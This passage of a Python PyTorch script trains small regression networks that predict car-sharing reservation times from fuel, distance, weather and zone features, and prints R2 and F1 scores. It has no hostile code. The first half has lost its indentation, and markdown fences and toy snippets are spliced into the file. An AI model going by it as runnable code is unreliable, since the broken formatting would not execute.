early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprop -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss.item()
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
print(f'Time spent: {time.time()-time_start}')
print('\n\n')
##################################
### ADD WEATHER AND DIST
##################################
print('----------------------------------------------')
print('---ADD WEATHER AND DIST')
print('----------------------------------------------')
# Prep data
df = df_full.drop(columns = list(df_full.filter(regex = 'lz').columns) + ['time'])
df['leave_fuel'] = df['leave_fuel']/100
df['degree'] = df['degree']/50
df['dist_to_station'] = df['dist_to_station']/5000
df[Weather_Scale.index] = (df[Weather_Scale.index] - Weather_Scale['Min'])/Weather_Scale['diff']
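# The line above min-max scales the weather columns to roughly [0, 1] using
# the precomputed Min and diff (presumably max - min) stored in Weather_Scale.
# Toy illustration with a hypothetical single 'temp' row (_ws, _col and
# _scaled are illustrative names only):
import pandas as pd
_ws = pd.DataFrame({'Min': [0.0], 'diff': [10.0]}, index=['temp'])
_col = pd.Series([0.0, 5.0, 10.0])
_scaled = (_col - _ws.loc['temp', 'Min']) / _ws.loc['temp', 'diff']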
X_train = torch.tensor(df.iloc[cc[0]].to_numpy(dtype = 'float')).float()
y_train = torch.tensor(y.iloc[cc[0]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_val = torch.tensor(df.iloc[cc[1]].to_numpy(dtype = 'float')).float()
y_val = torch.tensor(y.iloc[cc[1]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_test = torch.tensor(df.iloc[cc[2]].to_numpy(dtype = 'float')).float()
y_test = torch.tensor(y.iloc[cc[2]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(17,32),
nn.ReLU(),
nn.Dropout(0.1),
nn.Linear(32,32),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(32,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0003, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithWeather.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprop -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss.item()
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(17,128),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(128,64),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(64,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0003, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithWeather.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprop -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss.item()
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(17,128),
nn.ReLU(),
nn.Dropout(0.0),
nn.Linear(128,128),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(128,64),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(64,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0003, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithWeather.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprop -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss.item()
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
print(f'Time spent: {time.time()-time_start}')
print('\n\n')
##################################
### With all
##################################
print('----------------------------------------------')
print('---WITH ALL')
print('----------------------------------------------')
# Prep data
df = df_full.drop(columns = ['time'])
df['leave_fuel'] = df['leave_fuel']/100
df['degree'] = df['degree']/50
df['dist_to_station'] = df['dist_to_station']/5000
df[Weather_Scale.index] = (df[Weather_Scale.index] - Weather_Scale['Min'])/Weather_Scale['diff']
X_train = torch.tensor(df.iloc[cc[0]].to_numpy(dtype = 'float')).float()
y_train = torch.tensor(y.iloc[cc[0]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_val = torch.tensor(df.iloc[cc[1]].to_numpy(dtype = 'float')).float()
y_val = torch.tensor(y.iloc[cc[1]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_test = torch.tensor(df.iloc[cc[2]].to_numpy(dtype = 'float')).float()
y_test = torch.tensor(y.iloc[cc[2]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(273,16),
nn.ReLU(),
nn.Dropout(0.1),
nn.Linear(16,16),
nn.ReLU(),
nn.Dropout(0.1),
nn.Linear(16,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/Full.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprop -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
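# `EarlyStopping` used above is a helper defined outside this excerpt; its interface matches the
# common patience/checkpoint pattern. A minimal sketch of such a class, with `save_fn` standing in
# for the torch.save(model.state_dict(), path) call the real helper presumably makes:

```python
class EarlyStopping:
    """Stop training when the validation loss hasn't improved for `patience` epochs."""

    def __init__(self, patience=20, verbose=False, path='checkpoint.pt', save_fn=None):
        self.patience = patience
        self.verbose = verbose
        self.path = path
        self.save_fn = save_fn          # hypothetical hook; the real class calls torch.save directly
        self.best_loss = float('inf')
        self.counter = 0
        self.early_stop = False

    def __call__(self, val_loss, model):
        if val_loss < self.best_loss:
            # improvement: remember it, reset the counter, checkpoint the model
            self.best_loss = val_loss
            self.counter = 0
            if self.save_fn:
                self.save_fn(model, self.path)
        else:
            # no improvement this epoch
            self.counter += 1
            if self.counter >= self.patience:
                self.early_stop = True
```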
# define network
class Net(nn.Module):
    def __init__(self):
        super(Net, self).__init__()

        def init_weights(m):
            if isinstance(m, nn.Linear):
                torch.nn.init.xavier_normal_(m.weight)
                m.bias.data.fill_(0.01)

        self.seq = nn.Sequential(
            nn.Linear(273, 32),
            nn.ReLU(),
            nn.Dropout(0.1),
            nn.Linear(32, 16),
            nn.ReLU(),
            nn.Dropout(0.1),
            nn.Linear(16, 1),
        )
        self.seq.apply(init_weights)

    def forward(self, x):
        return self.seq(x)


net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay=0.0001)

num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size

# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []

get_slice = lambda i, size: range(i * size, (i + 1) * size)

path = 'Checkpoints/Full.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path=path)

for epoch in tqdm(range(num_epochs)):
    # Forward -> Backprop -> Update params
    ## Train
    cur_loss_train = 0
    net.train()
    for i in range(num_batches_train):
        optimizer.zero_grad()
        slce = get_slice(i, batch_size)
        output = net(X_train[slce])
        # compute gradients given loss
        target_batch = y_train[slce]
        batch_loss = r2_loss(output, target_batch)
        batch_loss.backward()
        optimizer.step()
        cur_loss_train += batch_loss.item()  # .item() keeps the running loss from retaining the graph
    train_losses.append(cur_loss_train / num_batches_train)

    ### Evaluate training
    with torch.no_grad():
        net.eval()
        train_preds, train_targs = [], []
        for i in range(num_batches_train):
            slce = get_slice(i, batch_size)
            output = net(X_train[slce])
            train_targs += list(y_train[slce].numpy())
            train_preds += list(output.numpy())

        ### Evaluate validation
        val_preds, val_targs = [], []
        cur_loss_val = 0
        for i in range(num_batches_valid):
            slce = get_slice(i, batch_size)
            output = net(X_val[slce])
            val_targs += list(y_val[slce].numpy())
            val_preds += list(output.numpy())
            cur_loss_val += r2_loss(output, y_val[slce]).item()
        val_losses.append(cur_loss_val / num_batches_valid)

    train_r2_cur = r2_score(train_targs, train_preds)
    valid_r2_cur = r2_score(val_targs, val_preds)
    train_r2.append(train_r2_cur)
    valid_r2.append(valid_r2_cur)

    # EarlyStopping
    early_stopping(val_losses[-1], net)
    if early_stopping.early_stop:
        break

# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:', r2_score(y_test.detach().numpy()[:, 0], net(X_test).detach().numpy()[:, 0]))
df_clas['Preds'] = net(X_test).detach().numpy()[:, 0]
print('F1-score:', classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut,
                                         target_names=['Under', 'Over'], zero_division=0,
                                         output_dict=True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
    def __init__(self):
        super(Net, self).__init__()

        def init_weights(m):
            if isinstance(m, nn.Linear):
                torch.nn.init.xavier_normal_(m.weight)
                m.bias.data.fill_(0.01)

        self.seq = nn.Sequential(
            nn.Linear(273, 128),
            nn.ReLU(),
            nn.Dropout(0.1),
            nn.Linear(128, 64),
            nn.ReLU(),
            nn.Dropout(0.1),
            nn.Linear(64, 1),
        )
        self.seq.apply(init_weights)

    def forward(self, x):
        return self.seq(x)


net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay=0.0001)

num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size

# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []

get_slice = lambda i, size: range(i * size, (i + 1) * size)

path = 'Checkpoints/Full.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path=path)

for epoch in tqdm(range(num_epochs)):
    # Forward -> Backprop -> Update params
    ## Train
    cur_loss_train = 0
    net.train()
    for i in range(num_batches_train):
        optimizer.zero_grad()
        slce = get_slice(i, batch_size)
        output = net(X_train[slce])
        # compute gradients given loss
        target_batch = y_train[slce]
        batch_loss = r2_loss(output, target_batch)
        batch_loss.backward()
        optimizer.step()
        cur_loss_train += batch_loss.item()  # .item() keeps the running loss from retaining the graph
    train_losses.append(cur_loss_train / num_batches_train)

    ### Evaluate training
    with torch.no_grad():
        net.eval()
        train_preds, train_targs = [], []
        for i in range(num_batches_train):
            slce = get_slice(i, batch_size)
            output = net(X_train[slce])
            train_targs += list(y_train[slce].numpy())
            train_preds += list(output.numpy())

        ### Evaluate validation
        val_preds, val_targs = [], []
        cur_loss_val = 0
        for i in range(num_batches_valid):
            slce = get_slice(i, batch_size)
            output = net(X_val[slce])
            val_targs += list(y_val[slce].numpy())
            val_preds += list(output.numpy())
            cur_loss_val += r2_loss(output, y_val[slce]).item()
        val_losses.append(cur_loss_val / num_batches_valid)

    train_r2_cur = r2_score(train_targs, train_preds)
    valid_r2_cur = r2_score(val_targs, val_preds)
    train_r2.append(train_r2_cur)
    valid_r2.append(valid_r2_cur)

    # EarlyStopping
    early_stopping(val_losses[-1], net)
    if early_stopping.early_stop:
        break

# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:', r2_score(y_test.detach().numpy()[:, 0], net(X_test).detach().numpy()[:, 0]))
df_clas['Preds'] = net(X_test).detach().numpy()[:, 0]
print('F1-score:', classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut,
                                         target_names=['Under', 'Over'], zero_division=0,
                                         output_dict=True)['Over']['f1-score'])
print('\n')
print(f'Time spent: {time.time()-time_start}')
print('\n\n')
##################################
### With all and encoded
##################################
print('----------------------------------------------')
print('---WITH ALL AND ENCODED')
print('----------------------------------------------')
# Prep data
df = df_full.drop(columns = ['time'])
df['leave_fuel'] = df['leave_fuel']/100
df['degree'] = df['degree']/50
df['dist_to_station'] = df['dist_to_station']/5000
df[Weather_Scale.index] = (df[Weather_Scale.index] - Weather_Scale['Min'])/Weather_Scale['diff']
# Target-mean encode the one-hot zone ('lz') columns, using train+validation rows only
Mean_Zone_Times = dict(
    pd.DataFrame({
        'Zone': df.iloc[np.concatenate(cc[:2])].filter(regex='lz').idxmax(axis=1).values,
        'Time': y.iloc[np.concatenate(cc[:2])].values,
    }).groupby('Zone').mean().squeeze()
)
df['Zone_E'] = df.filter(regex='lz').idxmax(axis=1).map(Mean_Zone_Times)
df.drop(columns=df.filter(regex='lz'), inplace=True)
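# In miniature, the zone encoding above turns the one-hot lz_* columns into a single
# target-encoded column (mean target per zone; here computed on all rows for brevity,
# whereas the script restricts it to train+validation indices):

```python
import pandas as pd

df_toy = pd.DataFrame({'lz_A': [1, 1, 0, 0], 'lz_B': [0, 0, 1, 1]})
y_toy = pd.Series([10.0, 20.0, 30.0, 50.0])

zones = df_toy.filter(regex='lz').idxmax(axis=1)          # zone label for each row
mean_zone_times = y_toy.groupby(zones).mean().to_dict()   # mean target per zone
df_toy['Zone_E'] = zones.map(mean_zone_times)
df_toy = df_toy.drop(columns=df_toy.filter(regex='lz').columns)
```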
X_train = torch.tensor(df.iloc[cc[0]].to_numpy(dtype = 'float')).float()
y_train = torch.tensor(y.iloc[cc[0]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_val = torch.tensor(df.iloc[cc[1]].to_numpy(dtype = 'float')).float()
y_val = torch.tensor(y.iloc[cc[1]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_test = torch.tensor(df.iloc[cc[2]].to_numpy(dtype = 'float')).float()
y_test = torch.tensor(y.iloc[cc[2]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
# define network
class Net(nn.Module):
    def __init__(self):
        super(Net, self).__init__()

        def init_weights(m):
            if isinstance(m, nn.Linear):
                torch.nn.init.xavier_normal_(m.weight)
                m.bias.data.fill_(0.01)

        self.seq = nn.Sequential(
            nn.Linear(18, 16),
            nn.ReLU(),
            nn.Dropout(0.0),
            nn.Linear(16, 16),
            nn.ReLU(),
            nn.Dropout(0.0),
            nn.Linear(16, 1),
        )
        self.seq.apply(init_weights)

    def forward(self, x):
        return self.seq(x)


net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay=0.0001)

num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size

# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []

get_slice = lambda i, size: range(i * size, (i + 1) * size)

path = 'Checkpoints/FullEncoded.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path=path)

for epoch in tqdm(range(num_epochs)):
    # Forward -> Backprop -> Update params
    ## Train
    cur_loss_train = 0
    net.train()
    for i in range(num_batches_train):
        optimizer.zero_grad()
        slce = get_slice(i, batch_size)
        output = net(X_train[slce])
        # compute gradients given loss
        target_batch = y_train[slce]
        batch_loss = r2_loss(output, target_batch)
        batch_loss.backward()
        optimizer.step()
        cur_loss_train += batch_loss.item()  # .item() keeps the running loss from retaining the graph
    train_losses.append(cur_loss_train / num_batches_train)

    ### Evaluate training
    with torch.no_grad():
        net.eval()
        train_preds, train_targs = [], []
        for i in range(num_batches_train):
            slce = get_slice(i, batch_size)
            output = net(X_train[slce])
            train_targs += list(y_train[slce].numpy())
            train_preds += list(output.numpy())

        ### Evaluate validation
        val_preds, val_targs = [], []
        cur_loss_val = 0
        for i in range(num_batches_valid):
            slce = get_slice(i, batch_size)
            output = net(X_val[slce])
            val_targs += list(y_val[slce].numpy())
            val_preds += list(output.numpy())
            cur_loss_val += r2_loss(output, y_val[slce]).item()
        val_losses.append(cur_loss_val / num_batches_valid)

    train_r2_cur = r2_score(train_targs, train_preds)
    valid_r2_cur = r2_score(val_targs, val_preds)
    train_r2.append(train_r2_cur)
    valid_r2.append(valid_r2_cur)

    # EarlyStopping
    early_stopping(val_losses[-1], net)
    if early_stopping.early_stop:
        break

# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:', r2_score(y_test.detach().numpy()[:, 0], net(X_test).detach().numpy()[:, 0]))
df_clas['Preds'] = net(X_test).detach().numpy()[:, 0]
print('F1-score:', classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut,
                                         target_names=['Under', 'Over'], zero_division=0,
                                         output_dict=True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
    def __init__(self):
        super(Net, self).__init__()

        def init_weights(m):
            if isinstance(m, nn.Linear):
                torch.nn.init.xavier_normal_(m.weight)
                m.bias.data.fill_(0.01)

        self.seq = nn.Sequential(
            nn.Linear(18, 32),
            nn.ReLU(),
            nn.Dropout(0.0),
            nn.Linear(32, 16),
            nn.ReLU(),
            nn.Dropout(0.0),
            nn.Linear(16, 1),
        )
        self.seq.apply(init_weights)

    def forward(self, x):
        return self.seq(x)


net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay=0.0001)

num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size

# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []

get_slice = lambda i, size: range(i * size, (i + 1) * size)

path = 'Checkpoints/FullEncoded.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path=path)

for epoch in tqdm(range(num_epochs)):
    # Forward -> Backprop -> Update params
    ## Train
    cur_loss_train = 0
    net.train()
    for i in range(num_batches_train):
        optimizer.zero_grad()
        slce = get_slice(i, batch_size)
        output = net(X_train[slce])
        # compute gradients given loss
        target_batch = y_train[slce]
        batch_loss = r2_loss(output, target_batch)
        batch_loss.backward()
        optimizer.step()
        cur_loss_train += batch_loss.item()  # .item() keeps the running loss from retaining the graph
    train_losses.append(cur_loss_train / num_batches_train)

    ### Evaluate training
    with torch.no_grad():
        net.eval()
        train_preds, train_targs = [], []
        for i in range(num_batches_train):
            slce = get_slice(i, batch_size)
            output = net(X_train[slce])
            train_targs += list(y_train[slce].numpy())
            train_preds += list(output.numpy())

        ### Evaluate validation
        val_preds, val_targs = [], []
        cur_loss_val = 0
        for i in range(num_batches_valid):
            slce = get_slice(i, batch_size)
            output = net(X_val[slce])
            val_targs += list(y_val[slce].numpy())
            val_preds += list(output.numpy())
            cur_loss_val += r2_loss(output, y_val[slce]).item()
        val_losses.append(cur_loss_val / num_batches_valid)

    train_r2_cur = r2_score(train_targs, train_preds)
    valid_r2_cur = r2_score(val_targs, val_preds)
    train_r2.append(train_r2_cur)
    valid_r2.append(valid_r2_cur)

    # EarlyStopping
    early_stopping(val_losses[-1], net)
    if early_stopping.early_stop:
        break

# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:', r2_score(y_test.detach().numpy()[:, 0], net(X_test).detach().numpy()[:, 0]))
df_clas['Preds'] = net(X_test).detach().numpy()[:, 0]
print('F1-score:', classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut,
                                         target_names=['Under', 'Over'], zero_division=0,
                                         output_dict=True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
    def __init__(self):
        super(Net, self).__init__()

        def init_weights(m):
            if isinstance(m, nn.Linear):
                torch.nn.init.xavier_normal_(m.weight)
                m.bias.data.fill_(0.01)

        self.seq = nn.Sequential(
